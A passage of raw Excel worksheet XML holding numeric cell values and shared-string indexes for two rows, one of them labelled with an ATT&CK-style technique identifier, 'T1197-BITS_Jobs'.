      </c>
      <c r="HB44" s="113">
        <v>75</v>
      </c>
      <c r="HC44" s="114" t="s">
        <v>3161</v>
      </c>
      <c r="HD44" s="503">
        <v>75</v>
      </c>
      <c r="HE44" s="115" t="s">
        <v>3162</v>
      </c>
      <c r="HF44" s="115">
        <v>4</v>
      </c>
      <c r="HG44" s="116">
        <v>73</v>
      </c>
      <c r="HH44" s="101">
        <v>0</v>
      </c>
      <c r="HI44" s="102">
        <v>0</v>
      </c>
      <c r="HJ44" s="102">
        <v>0</v>
      </c>
      <c r="HK44" s="103">
        <v>0</v>
      </c>
      <c r="HL44" s="103">
        <v>0</v>
      </c>
      <c r="HM44" s="104">
        <v>0</v>
      </c>
      <c r="HN44" s="105">
        <v>0</v>
      </c>
      <c r="HO44" s="106">
        <v>0</v>
      </c>
      <c r="HP44" s="497">
        <v>0</v>
      </c>
      <c r="HQ44" s="107">
        <v>0</v>
      </c>
      <c r="HR44" s="107">
        <v>0</v>
      </c>
      <c r="HS44" s="108">
        <v>0</v>
      </c>
      <c r="HT44" s="109">
        <v>0</v>
      </c>
      <c r="HU44" s="110">
        <v>0</v>
      </c>
      <c r="HV44" s="501">
        <v>0</v>
      </c>
      <c r="HW44" s="111">
        <v>0</v>
      </c>
      <c r="HX44" s="111">
        <v>0</v>
      </c>
      <c r="HY44" s="112">
        <v>0</v>
      </c>
      <c r="HZ44" s="113">
        <v>0</v>
      </c>
      <c r="IA44" s="114">
        <v>0</v>
      </c>
      <c r="IB44" s="503">
        <v>0</v>
      </c>
      <c r="IC44" s="115">
        <v>0</v>
      </c>
      <c r="ID44" s="115">
        <v>0</v>
      </c>
      <c r="IE44" s="116">
        <v>0</v>
      </c>
      <c r="IF44" s="250">
        <v>0</v>
      </c>
      <c r="IG44" s="251">
        <v>0</v>
      </c>
      <c r="IH44" s="505">
        <v>0</v>
      </c>
      <c r="II44" s="252">
        <v>0</v>
      </c>
      <c r="IJ44" s="252">
        <v>0</v>
      </c>
      <c r="IK44" s="253">
        <v>0</v>
      </c>
      <c r="IL44" s="101">
        <v>0</v>
      </c>
      <c r="IM44" s="102">
        <v>0</v>
      </c>
      <c r="IN44" s="102">
        <v>0</v>
      </c>
      <c r="IO44" s="103">
        <v>0</v>
      </c>
      <c r="IP44" s="103">
        <v>0</v>
      </c>
      <c r="IQ44" s="104">
        <v>0</v>
      </c>
      <c r="IR44" s="105">
        <v>0</v>
      </c>
      <c r="IS44" s="106">
        <v>0</v>
      </c>
      <c r="IT44" s="497">
        <v>0</v>
      </c>
      <c r="IU44" s="107">
        <v>0</v>
      </c>
      <c r="IV44" s="107">
        <v>0</v>
      </c>
      <c r="IW44" s="108">
        <v>0</v>
      </c>
      <c r="IX44" s="109">
        <v>0</v>
      </c>
      <c r="IY44" s="110">
        <v>0</v>
      </c>
      <c r="IZ44" s="501">
        <v>0</v>
      </c>
      <c r="JA44" s="111">
        <v>0</v>
      </c>
      <c r="JB44" s="111">
        <v>0</v>
      </c>
      <c r="JC44" s="112">
        <v>0</v>
      </c>
      <c r="JD44" s="113">
        <v>0</v>
      </c>
      <c r="JE44" s="114">
        <v>0</v>
      </c>
      <c r="JF44" s="503">
        <v>0</v>
      </c>
      <c r="JG44" s="115">
        <v>0</v>
      </c>
      <c r="JH44" s="115">
        <v>0</v>
      </c>
      <c r="JI44" s="116">
        <v>0</v>
      </c>
      <c r="JJ44" s="101">
        <v>0</v>
      </c>
      <c r="JK44" s="102">
        <v>0</v>
      </c>
      <c r="JL44" s="102">
        <v>0</v>
      </c>
      <c r="JM44" s="103">
        <v>0</v>
      </c>
      <c r="JN44" s="103">
        <v>0</v>
      </c>
      <c r="JO44" s="104">
        <v>0</v>
      </c>
      <c r="JP44" s="105">
        <v>0</v>
      </c>
      <c r="JQ44" s="106">
        <v>0</v>
      </c>
      <c r="JR44" s="497">
        <v>0</v>
      </c>
      <c r="JS44" s="107">
        <v>0</v>
      </c>
      <c r="JT44" s="107">
        <v>0</v>
      </c>
      <c r="JU44" s="108">
        <v>0</v>
      </c>
      <c r="JV44" s="109">
        <v>0</v>
      </c>
      <c r="JW44" s="110">
        <v>0</v>
      </c>
      <c r="JX44" s="501">
        <v>0</v>
      </c>
      <c r="JY44" s="111">
        <v>0</v>
      </c>
      <c r="JZ44" s="111">
        <v>0</v>
      </c>
      <c r="KA44" s="112">
        <v>0</v>
      </c>
      <c r="KB44" s="113">
        <v>0</v>
      </c>
      <c r="KC44" s="114">
        <v>0</v>
      </c>
      <c r="KD44" s="503">
        <v>0</v>
      </c>
      <c r="KE44" s="115">
        <v>0</v>
      </c>
      <c r="KF44" s="115">
        <v>0</v>
      </c>
      <c r="KG44" s="116">
        <v>0</v>
      </c>
      <c r="KH44" s="250">
        <v>0</v>
      </c>
      <c r="KI44" s="251">
        <v>0</v>
      </c>
      <c r="KJ44" s="505">
        <v>0</v>
      </c>
      <c r="KK44" s="252">
        <v>0</v>
      </c>
      <c r="KL44" s="252">
        <v>0</v>
      </c>
      <c r="KM44" s="253">
        <v>0</v>
      </c>
      <c r="KN44" s="101">
        <v>0</v>
      </c>
      <c r="KO44" s="102">
        <v>0</v>
      </c>
      <c r="KP44" s="102">
        <v>0</v>
      </c>
      <c r="KQ44" s="103">
        <v>0</v>
      </c>
      <c r="KR44" s="103">
        <v>0</v>
      </c>
      <c r="KS44" s="104">
        <v>0</v>
      </c>
      <c r="KT44" s="105">
        <v>0</v>
      </c>
      <c r="KU44" s="106">
        <v>0</v>
      </c>
      <c r="KV44" s="497">
        <v>0</v>
      </c>
      <c r="KW44" s="107">
        <v>0</v>
      </c>
      <c r="KX44" s="107">
        <v>0</v>
      </c>
      <c r="KY44" s="108">
        <v>0</v>
      </c>
      <c r="KZ44" s="109">
        <v>0</v>
      </c>
      <c r="LA44" s="110">
        <v>0</v>
      </c>
      <c r="LB44" s="501">
        <v>0</v>
      </c>
      <c r="LC44" s="111">
        <v>0</v>
      </c>
      <c r="LD44" s="111">
        <v>0</v>
      </c>
      <c r="LE44" s="112">
        <v>0</v>
      </c>
      <c r="LF44" s="113">
        <v>0</v>
      </c>
      <c r="LG44" s="114">
        <v>0</v>
      </c>
      <c r="LH44" s="503">
        <v>0</v>
      </c>
      <c r="LI44" s="115">
        <v>0</v>
      </c>
      <c r="LJ44" s="115">
        <v>0</v>
      </c>
      <c r="LK44" s="116">
        <v>0</v>
      </c>
      <c r="LL44" s="117">
        <v>226</v>
      </c>
      <c r="LM44" s="507">
        <v>214</v>
      </c>
      <c r="LN44" s="119">
        <v>2</v>
      </c>
      <c r="LO44" s="119">
        <v>1</v>
      </c>
      <c r="LP44" s="119">
        <v>76</v>
      </c>
      <c r="LQ44" s="119">
        <v>76</v>
      </c>
      <c r="LR44" s="119">
        <v>76</v>
      </c>
      <c r="LS44" s="119">
        <v>76</v>
      </c>
      <c r="LT44" s="382"/>
      <c r="LU44" s="117">
        <v>0</v>
      </c>
      <c r="LV44" s="118">
        <v>0</v>
      </c>
      <c r="LW44" s="507">
        <v>0</v>
      </c>
      <c r="LX44" s="119">
        <v>0</v>
      </c>
      <c r="LY44" s="119">
        <v>0</v>
      </c>
      <c r="LZ44" s="119">
        <v>0</v>
      </c>
      <c r="MA44" s="117">
        <v>0</v>
      </c>
      <c r="MB44" s="118">
        <v>0</v>
      </c>
      <c r="MC44" s="507">
        <v>0</v>
      </c>
      <c r="MD44" s="119">
        <v>0</v>
      </c>
      <c r="ME44" s="119">
        <v>0</v>
      </c>
      <c r="MF44" s="119">
        <v>0</v>
      </c>
      <c r="MG44" s="117">
        <v>86</v>
      </c>
      <c r="MH44" s="118" t="s">
        <v>4214</v>
      </c>
      <c r="MI44" s="507">
        <v>75</v>
      </c>
      <c r="MJ44" s="119" t="s">
        <v>3163</v>
      </c>
      <c r="MK44" s="119">
        <v>1</v>
      </c>
      <c r="ML44" s="119">
        <v>75</v>
      </c>
      <c r="MM44" s="117">
        <v>64</v>
      </c>
      <c r="MN44" s="118" t="s">
        <v>4215</v>
      </c>
      <c r="MO44" s="507">
        <v>63</v>
      </c>
      <c r="MP44" s="119" t="s">
        <v>3118</v>
      </c>
      <c r="MQ44" s="119">
        <v>1</v>
      </c>
      <c r="MR44" s="119">
        <v>63</v>
      </c>
      <c r="MS44" s="117">
        <v>0</v>
      </c>
      <c r="MT44" s="118">
        <v>0</v>
      </c>
      <c r="MU44" s="507">
        <v>0</v>
      </c>
      <c r="MV44" s="119">
        <v>0</v>
      </c>
      <c r="MW44" s="119">
        <v>0</v>
      </c>
      <c r="MX44" s="119">
        <v>0</v>
      </c>
      <c r="MY44" s="117">
        <v>0</v>
      </c>
      <c r="MZ44" s="118">
        <v>0</v>
      </c>
      <c r="NA44" s="507">
        <v>0</v>
      </c>
      <c r="NB44" s="119">
        <v>0</v>
      </c>
      <c r="NC44" s="119">
        <v>0</v>
      </c>
      <c r="ND44" s="119">
        <v>0</v>
      </c>
      <c r="NE44" s="117">
        <v>0</v>
      </c>
      <c r="NF44" s="118">
        <v>0</v>
      </c>
      <c r="NG44" s="507">
        <v>0</v>
      </c>
      <c r="NH44" s="119">
        <v>0</v>
      </c>
      <c r="NI44" s="119">
        <v>0</v>
      </c>
      <c r="NJ44" s="119">
        <v>0</v>
      </c>
      <c r="NK44" s="117">
        <v>76</v>
      </c>
      <c r="NL44" s="118" t="s">
        <v>4358</v>
      </c>
      <c r="NM44" s="507">
        <v>76</v>
      </c>
      <c r="NN44" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO44" s="119">
        <v>1</v>
      </c>
      <c r="NP44" s="119">
        <v>76</v>
      </c>
      <c r="NQ44" s="117">
        <v>0</v>
      </c>
      <c r="NR44" s="118">
        <v>0</v>
      </c>
      <c r="NS44" s="507">
        <v>0</v>
      </c>
      <c r="NT44" s="119">
        <v>0</v>
      </c>
      <c r="NU44" s="119">
        <v>0</v>
      </c>
      <c r="NV44" s="119">
        <v>0</v>
      </c>
      <c r="NW44" s="117">
        <v>0</v>
      </c>
      <c r="NX44" s="118">
        <v>0</v>
      </c>
      <c r="NY44" s="507">
        <v>0</v>
      </c>
      <c r="NZ44" s="119">
        <v>0</v>
      </c>
      <c r="OA44" s="119">
        <v>0</v>
      </c>
      <c r="OB44" s="119">
        <v>0</v>
      </c>
      <c r="OC44" s="120">
        <v>112</v>
      </c>
      <c r="OD44" s="120">
        <v>112</v>
      </c>
      <c r="OE44" s="120">
        <v>18</v>
      </c>
      <c r="OF44" s="121">
        <v>1</v>
      </c>
      <c r="OG44" s="120">
        <v>76</v>
      </c>
      <c r="OH44" s="120">
        <v>76</v>
      </c>
      <c r="OI44" s="120">
        <v>76</v>
      </c>
      <c r="OJ44" s="120">
        <v>76</v>
      </c>
      <c r="OK44" s="383"/>
      <c r="OL44" s="120">
        <v>76</v>
      </c>
      <c r="OM44" s="120">
        <v>76</v>
      </c>
      <c r="ON44" s="120">
        <v>76</v>
      </c>
      <c r="OO44" s="120" t="s">
        <v>2844</v>
      </c>
      <c r="OP44" s="120">
        <v>1</v>
      </c>
      <c r="OQ44" s="464">
        <v>76</v>
      </c>
      <c r="OR44" s="120">
        <v>11</v>
      </c>
      <c r="OS44" s="120">
        <v>11</v>
      </c>
      <c r="OT44" s="120">
        <v>11</v>
      </c>
      <c r="OU44" s="120" t="s">
        <v>3164</v>
      </c>
      <c r="OV44" s="120">
        <v>2</v>
      </c>
      <c r="OW44" s="464">
        <v>11</v>
      </c>
      <c r="OX44" s="120">
        <v>24</v>
      </c>
      <c r="OY44" s="120">
        <v>24</v>
      </c>
      <c r="OZ44" s="120">
        <v>24</v>
      </c>
      <c r="PA44" s="120" t="s">
        <v>3165</v>
      </c>
      <c r="PB44" s="120">
        <v>14</v>
      </c>
      <c r="PC44" s="464">
        <v>15</v>
      </c>
      <c r="PD44" s="120">
        <v>1</v>
      </c>
      <c r="PE44" s="120">
        <v>1</v>
      </c>
      <c r="PF44" s="120">
        <v>1</v>
      </c>
      <c r="PG44" s="120" t="s">
        <v>3166</v>
      </c>
      <c r="PH44" s="120">
        <v>1</v>
      </c>
      <c r="PI44" s="464">
        <v>1</v>
      </c>
      <c r="PJ44" s="120">
        <v>0</v>
      </c>
      <c r="PK44" s="120">
        <v>0</v>
      </c>
      <c r="PL44" s="120">
        <v>0</v>
      </c>
      <c r="PM44" s="120"/>
      <c r="PN44" s="120">
        <v>0</v>
      </c>
      <c r="PO44" s="464">
        <v>0</v>
      </c>
      <c r="PP44" s="120">
        <v>0</v>
      </c>
      <c r="PQ44" s="120">
        <v>0</v>
      </c>
      <c r="PR44" s="120">
        <v>0</v>
      </c>
      <c r="PS44" s="120"/>
      <c r="PT44" s="120">
        <v>0</v>
      </c>
      <c r="PU44" s="464">
        <v>0</v>
      </c>
      <c r="PV44" s="120">
        <v>0</v>
      </c>
      <c r="PW44" s="120">
        <v>0</v>
      </c>
      <c r="PX44" s="120">
        <v>0</v>
      </c>
      <c r="PY44" s="120"/>
      <c r="PZ44" s="120">
        <v>0</v>
      </c>
      <c r="QA44" s="464">
        <v>0</v>
      </c>
      <c r="QB44" s="120">
        <v>0</v>
      </c>
      <c r="QC44" s="120">
        <v>0</v>
      </c>
      <c r="QD44" s="120">
        <v>0</v>
      </c>
      <c r="QE44" s="120"/>
      <c r="QF44" s="120">
        <v>0</v>
      </c>
      <c r="QG44" s="464">
        <v>0</v>
      </c>
      <c r="QH44" s="120">
        <v>112</v>
      </c>
      <c r="QI44" s="120">
        <v>112</v>
      </c>
      <c r="QJ44" s="120">
        <v>76</v>
      </c>
      <c r="QK44" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL44" s="120">
        <v>1</v>
      </c>
      <c r="QM44" s="464">
        <v>76</v>
      </c>
      <c r="QN44" s="120">
        <v>0</v>
      </c>
      <c r="QO44" s="120">
        <v>0</v>
      </c>
      <c r="QP44" s="120">
        <v>0</v>
      </c>
      <c r="QQ44" s="120"/>
      <c r="QR44" s="120">
        <v>0</v>
      </c>
      <c r="QS44" s="464">
        <v>0</v>
      </c>
      <c r="QT44" s="184"/>
      <c r="QU44" s="184"/>
      <c r="QV44" s="184"/>
      <c r="QW44" s="184"/>
      <c r="QX44" s="184"/>
      <c r="QY44" s="184"/>
      <c r="QZ44" s="184"/>
      <c r="RA44" s="184"/>
      <c r="RB44" s="184"/>
      <c r="RC44" s="184"/>
      <c r="RD44" s="184"/>
      <c r="RE44" s="184"/>
      <c r="RF44" s="184"/>
      <c r="RG44" s="184"/>
      <c r="RH44" s="184"/>
      <c r="RI44" s="184"/>
      <c r="RJ44" s="184"/>
      <c r="RK44" s="184"/>
      <c r="RL44" s="184"/>
      <c r="RM44" s="184"/>
      <c r="RN44" s="184"/>
      <c r="RO44" s="184"/>
      <c r="RP44" s="184"/>
      <c r="RQ44" s="184"/>
      <c r="RR44" s="184"/>
      <c r="RS44" s="184"/>
      <c r="RT44" s="184"/>
      <c r="RU44" s="184"/>
      <c r="RV44" s="184"/>
      <c r="RW44" s="184"/>
      <c r="RX44" s="184"/>
      <c r="RY44" s="184"/>
      <c r="RZ44" s="184"/>
      <c r="SA44" s="184"/>
      <c r="SB44" s="184"/>
      <c r="SC44" s="184"/>
      <c r="SD44" s="184"/>
      <c r="SE44" s="184"/>
      <c r="SF44" s="184"/>
      <c r="SG44" s="184"/>
      <c r="SH44" s="184"/>
      <c r="SI44" s="184"/>
      <c r="SJ44" s="184"/>
      <c r="SK44" s="184"/>
      <c r="SL44" s="184"/>
      <c r="SM44" s="184"/>
      <c r="SN44" s="184"/>
      <c r="SO44" s="184"/>
      <c r="SP44" s="184"/>
      <c r="SQ44" s="184"/>
      <c r="SR44" s="184"/>
      <c r="SS44" s="184"/>
      <c r="ST44" s="184"/>
      <c r="SU44" s="184"/>
      <c r="SV44" s="184"/>
      <c r="SW44" s="184"/>
      <c r="SX44" s="184"/>
      <c r="SY44" s="184"/>
      <c r="SZ44" s="184"/>
      <c r="TA44" s="184"/>
      <c r="TB44" s="184"/>
      <c r="TC44" s="184"/>
      <c r="TD44" s="184"/>
      <c r="TE44" s="184"/>
      <c r="TF44" s="184"/>
      <c r="TG44" s="184"/>
      <c r="TH44" s="184"/>
      <c r="TI44" s="184"/>
      <c r="TJ44" s="184"/>
      <c r="TK44" s="184"/>
      <c r="TL44" s="184"/>
      <c r="TM44" s="184"/>
      <c r="TN44" s="184"/>
      <c r="TO44" s="184"/>
      <c r="TP44" s="184"/>
      <c r="TQ44" s="184"/>
      <c r="TR44" s="184"/>
      <c r="TS44" s="184"/>
      <c r="TT44" s="184"/>
      <c r="TU44" s="184"/>
      <c r="TV44" s="184"/>
      <c r="TW44" s="184"/>
      <c r="TX44" s="184"/>
      <c r="TY44" s="184"/>
      <c r="TZ44" s="184"/>
      <c r="UA44" s="184"/>
      <c r="UB44" s="184"/>
      <c r="UC44" s="184"/>
      <c r="UD44" s="184"/>
      <c r="UE44" s="184"/>
      <c r="UF44" s="184"/>
      <c r="UG44" s="184"/>
      <c r="UH44" s="184"/>
      <c r="UI44" s="184"/>
      <c r="UJ44" s="184"/>
      <c r="UK44" s="184"/>
      <c r="UL44" s="184"/>
      <c r="UM44" s="184"/>
      <c r="UN44" s="184"/>
      <c r="UO44" s="184"/>
      <c r="UP44" s="184"/>
      <c r="UQ44" s="184"/>
      <c r="UR44" s="184"/>
      <c r="US44" s="184"/>
      <c r="UT44" s="184"/>
      <c r="UU44" s="184"/>
      <c r="UV44" s="184"/>
      <c r="UW44" s="184"/>
      <c r="UX44" s="184"/>
      <c r="UY44" s="184"/>
      <c r="UZ44" s="184"/>
      <c r="VA44" s="184"/>
      <c r="VB44" s="184"/>
      <c r="VC44" s="184"/>
      <c r="VD44" s="184"/>
      <c r="VE44" s="184"/>
      <c r="VF44" s="184"/>
      <c r="VG44" s="184"/>
      <c r="VH44" s="184"/>
      <c r="VI44" s="184"/>
      <c r="VJ44" s="184"/>
      <c r="VK44" s="184"/>
      <c r="VL44" s="184"/>
      <c r="VM44" s="184"/>
      <c r="VN44" s="184"/>
      <c r="VO44" s="184"/>
      <c r="VP44" s="184"/>
      <c r="VQ44" s="184"/>
      <c r="VR44" s="184"/>
      <c r="VS44" s="184"/>
      <c r="VT44" s="184"/>
      <c r="VU44" s="184"/>
      <c r="VV44" s="184"/>
      <c r="VW44" s="184"/>
      <c r="VX44" s="184"/>
      <c r="VY44" s="184"/>
    </row>
    <row r="45" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A45" s="82" t="s">
        <v>44</v>
      </c>
      <c r="B45" s="83" t="s">
        <v>47</v>
      </c>
      <c r="C45" s="83" t="s">
        <v>428</v>
      </c>
      <c r="D45" s="83" t="s">
        <v>82</v>
      </c>
      <c r="E45" s="83">
        <f t="shared" si="2"/>
        <v>33</v>
      </c>
      <c r="F45" s="83" t="s">
        <v>83</v>
      </c>
      <c r="G45" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H45" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I45" s="81" t="s">
        <v>1144</v>
      </c>
      <c r="J45" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K45" s="81" t="s">
        <v>1145</v>
      </c>
      <c r="L45" s="81" t="s">
        <v>1146</v>
      </c>
      <c r="M45" s="378" t="s">
        <v>217</v>
      </c>
      <c r="N45" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O45" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P45" s="91"/>
      <c r="Q45" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R45" s="92" t="s">
        <v>1147</v>
      </c>
      <c r="S45" s="93" t="s">
        <v>749</v>
      </c>
      <c r="T45" s="92" t="s">
        <v>1148</v>
      </c>
      <c r="U45" s="94" t="s">
        <v>1149</v>
      </c>
      <c r="V45" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W45" s="96" t="s">
        <v>1150</v>
      </c>
      <c r="X45" s="97" t="s">
        <v>1151</v>
      </c>
      <c r="Y45" s="83" t="s">
        <v>1152</v>
      </c>
      <c r="Z45" s="188" t="s">
        <v>1153</v>
      </c>
      <c r="AA45" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB45" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC45" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD45" s="83"/>
      <c r="AE45" s="83"/>
      <c r="AF45" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG45" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH45" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI45" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ45" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK45" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL45" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM45" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN45" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO45" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP45" s="385" t="str">
        <f>M45&amp;"-frag"</f>
        <v>T1197-BITS_Jobs-frag</v>
      </c>
      <c r="AQ45" s="646">
        <v>43</v>
      </c>
      <c r="AR45" s="100"/>
      <c r="AS45" s="100">
        <v>9</v>
      </c>
      <c r="AT45" s="100">
        <v>2</v>
      </c>
      <c r="AU45" s="100">
        <v>11</v>
      </c>
      <c r="AV45" s="92" t="s">
        <v>1154</v>
      </c>
      <c r="AW45" s="100">
        <v>16</v>
      </c>
      <c r="AX45" s="100">
        <v>16</v>
      </c>
      <c r="AY45" s="100">
        <v>2</v>
      </c>
      <c r="AZ45" s="100">
        <v>18</v>
      </c>
      <c r="BA45" s="381" t="s">
        <v>4884</v>
      </c>
      <c r="BB45" s="101">
        <v>7</v>
      </c>
      <c r="BC45" s="102" t="s">
        <v>3167</v>
      </c>
      <c r="BD45" s="102">
        <v>3</v>
      </c>
      <c r="BE45" s="103" t="s">
        <v>1805</v>
      </c>
      <c r="BF45" s="103">
        <v>2</v>
      </c>
      <c r="BG45" s="104">
        <v>3</v>
      </c>
      <c r="BH45" s="105">
        <v>38</v>
      </c>
      <c r="BI45" s="106" t="s">
        <v>3168</v>
      </c>
      <c r="BJ45" s="497">
        <v>32</v>
      </c>
      <c r="BK45" s="107" t="s">
        <v>3169</v>
      </c>
      <c r="BL45" s="107">
        <v>6</v>
      </c>
      <c r="BM45" s="108">
        <v>10</v>
      </c>
      <c r="BN45" s="109">
        <v>45</v>
      </c>
      <c r="BO45" s="110" t="s">
        <v>2012</v>
      </c>
      <c r="BP45" s="501">
        <v>35</v>
      </c>
      <c r="BQ45" s="111" t="s">
        <v>2013</v>
      </c>
      <c r="BR45" s="111">
        <v>8</v>
      </c>
      <c r="BS45" s="112">
        <v>11</v>
      </c>
      <c r="BT45" s="113">
        <v>53</v>
      </c>
      <c r="BU45" s="114" t="s">
        <v>3170</v>
      </c>
      <c r="BV45" s="503">
        <v>37</v>
      </c>
      <c r="BW45" s="115" t="s">
        <v>3171</v>
      </c>
      <c r="BX45" s="115">
        <v>9</v>
      </c>
      <c r="BY45" s="116">
        <v>13</v>
      </c>
      <c r="BZ45" s="250">
        <v>62</v>
      </c>
      <c r="CA45" s="251" t="s">
        <v>3172</v>
      </c>
      <c r="CB45" s="505">
        <v>48</v>
      </c>
      <c r="CC45" s="252" t="s">
        <v>3173</v>
      </c>
      <c r="CD45" s="252">
        <v>12</v>
      </c>
      <c r="CE45" s="253">
        <v>12</v>
      </c>
      <c r="CF45" s="101">
        <v>115</v>
      </c>
      <c r="CG45" s="102" t="s">
        <v>3174</v>
      </c>
      <c r="CH45" s="102">
        <v>85</v>
      </c>
      <c r="CI45" s="103" t="s">
        <v>3175</v>
      </c>
      <c r="CJ45" s="103">
        <v>21</v>
      </c>
      <c r="CK45" s="104">
        <v>15</v>
      </c>
      <c r="CL45" s="105">
        <v>0</v>
      </c>
      <c r="CM45" s="106">
        <v>0</v>
      </c>
      <c r="CN45" s="497">
        <v>0</v>
      </c>
      <c r="CO45" s="107">
        <v>0</v>
      </c>
      <c r="CP45" s="107">
        <v>0</v>
      </c>
      <c r="CQ45" s="108">
        <v>0</v>
      </c>
      <c r="CR45" s="109">
        <v>12</v>
      </c>
      <c r="CS45" s="110" t="s">
        <v>3176</v>
      </c>
      <c r="CT45" s="501">
        <v>6</v>
      </c>
      <c r="CU45" s="111" t="s">
        <v>3177</v>
      </c>
      <c r="CV45" s="111">
        <v>2</v>
      </c>
      <c r="CW45" s="112">
        <v>6</v>
      </c>
      <c r="CX45" s="113">
        <v>57</v>
      </c>
      <c r="CY45" s="114" t="s">
        <v>2155</v>
      </c>
      <c r="CZ45" s="503">
        <v>41</v>
      </c>
      <c r="DA45" s="115" t="s">
        <v>2156</v>
      </c>
      <c r="DB45" s="115">
        <v>10</v>
      </c>
      <c r="DC45" s="116">
        <v>13</v>
      </c>
      <c r="DD45" s="101">
        <v>0</v>
      </c>
      <c r="DE45" s="102">
        <v>0</v>
      </c>
      <c r="DF45" s="102">
        <v>0</v>
      </c>
      <c r="DG45" s="103">
        <v>0</v>
      </c>
      <c r="DH45" s="103">
        <v>0</v>
      </c>
      <c r="DI45" s="104">
        <v>0</v>
      </c>
      <c r="DJ45" s="105">
        <v>8</v>
      </c>
      <c r="DK45" s="106" t="s">
        <v>3178</v>
      </c>
      <c r="DL45" s="497">
        <v>8</v>
      </c>
      <c r="DM45" s="107" t="s">
        <v>3179</v>
      </c>
      <c r="DN45" s="107">
        <v>2</v>
      </c>
      <c r="DO45" s="108">
        <v>8</v>
      </c>
      <c r="DP45" s="109">
        <v>8</v>
      </c>
      <c r="DQ45" s="110" t="s">
        <v>3178</v>
      </c>
      <c r="DR45" s="501">
        <v>8</v>
      </c>
      <c r="DS45" s="111" t="s">
        <v>3179</v>
      </c>
      <c r="DT45" s="111">
        <v>2</v>
      </c>
      <c r="DU45" s="112">
        <v>8</v>
      </c>
      <c r="DV45" s="113">
        <v>34</v>
      </c>
      <c r="DW45" s="114" t="s">
        <v>3180</v>
      </c>
      <c r="DX45" s="503">
        <v>28</v>
      </c>
      <c r="DY45" s="115" t="s">
        <v>3181</v>
      </c>
      <c r="DZ45" s="115">
        <v>5</v>
      </c>
      <c r="EA45" s="116">
        <v>10</v>
      </c>
      <c r="EB45" s="250">
        <v>16</v>
      </c>
      <c r="EC45" s="251" t="s">
        <v>3182</v>
      </c>
      <c r="ED45" s="505">
        <v>16</v>
      </c>
      <c r="EE45" s="252" t="s">
        <v>3183</v>
      </c>
      <c r="EF45" s="252">
        <v>4</v>
      </c>
      <c r="EG45" s="253">
        <v>8</v>
      </c>
      <c r="EH45" s="101">
        <v>50</v>
      </c>
      <c r="EI45" s="102" t="s">
        <v>3184</v>
      </c>
      <c r="EJ45" s="102">
        <v>44</v>
      </c>
      <c r="EK45" s="103" t="s">
        <v>3185</v>
      </c>
      <c r="EL45" s="103">
        <v>9</v>
      </c>
      <c r="EM45" s="104">
        <v>10</v>
      </c>
      <c r="EN45" s="105">
        <v>0</v>
      </c>
      <c r="EO45" s="106">
        <v>0</v>
      </c>
      <c r="EP45" s="497">
        <v>0</v>
      </c>
      <c r="EQ45" s="107">
        <v>0</v>
      </c>
      <c r="ER45" s="107">
        <v>0</v>
      </c>
      <c r="ES45" s="108">
        <v>0</v>
      </c>
      <c r="ET45" s="109">
        <v>0</v>
      </c>
      <c r="EU45" s="110">
        <v>0</v>
      </c>
      <c r="EV45" s="501">
        <v>0</v>
      </c>
      <c r="EW45" s="111">
        <v>0</v>
      </c>
      <c r="EX45" s="111">
        <v>0</v>
      </c>
      <c r="EY45" s="112">
        <v>0</v>
      </c>
      <c r="EZ45" s="113">
        <v>8</v>
      </c>
      <c r="FA45" s="114" t="s">
        <v>3178</v>
      </c>
      <c r="FB45" s="503">
        <v>8</v>
      </c>
      <c r="FC45" s="115" t="s">
        <v>3179</v>
      </c>
      <c r="FD45" s="115">
        <v>2</v>
      </c>
      <c r="FE45" s="116">
        <v>8</v>
      </c>
      <c r="FF45" s="101">
        <v>7</v>
      </c>
      <c r="FG45" s="102" t="s">
        <v>3167</v>
      </c>
      <c r="FH45" s="102">
        <v>3</v>
      </c>
      <c r="FI45" s="103" t="s">
        <v>1805</v>
      </c>
      <c r="FJ45" s="103">
        <v>2</v>
      </c>
      <c r="FK45" s="104">
        <v>3</v>
      </c>
      <c r="FL45" s="105">
        <v>20</v>
      </c>
      <c r="FM45" s="106" t="s">
        <v>3186</v>
      </c>
      <c r="FN45" s="497">
        <v>14</v>
      </c>
      <c r="FO45" s="107" t="s">
        <v>3187</v>
      </c>
      <c r="FP45" s="107">
        <v>2</v>
      </c>
      <c r="FQ45" s="108">
        <v>8</v>
      </c>
      <c r="FR45" s="109">
        <v>27</v>
      </c>
      <c r="FS45" s="110" t="s">
        <v>3188</v>
      </c>
      <c r="FT45" s="501">
        <v>17</v>
      </c>
      <c r="FU45" s="111" t="s">
        <v>3189</v>
      </c>
      <c r="FV45" s="111">
        <v>4</v>
      </c>
      <c r="FW45" s="112">
        <v>11</v>
      </c>
      <c r="FX45" s="113">
        <v>11</v>
      </c>
      <c r="FY45" s="114" t="s">
        <v>3190</v>
      </c>
      <c r="FZ45" s="503">
        <v>7</v>
      </c>
      <c r="GA45" s="115" t="s">
        <v>3191</v>
      </c>
      <c r="GB45" s="115">
        <v>3</v>
      </c>
      <c r="GC45" s="116">
        <v>7</v>
      </c>
      <c r="GD45" s="250">
        <v>34</v>
      </c>
      <c r="GE45" s="251" t="s">
        <v>3192</v>
      </c>
      <c r="GF45" s="505">
        <v>20</v>
      </c>
      <c r="GG45" s="252" t="s">
        <v>3193</v>
      </c>
      <c r="GH45" s="252">
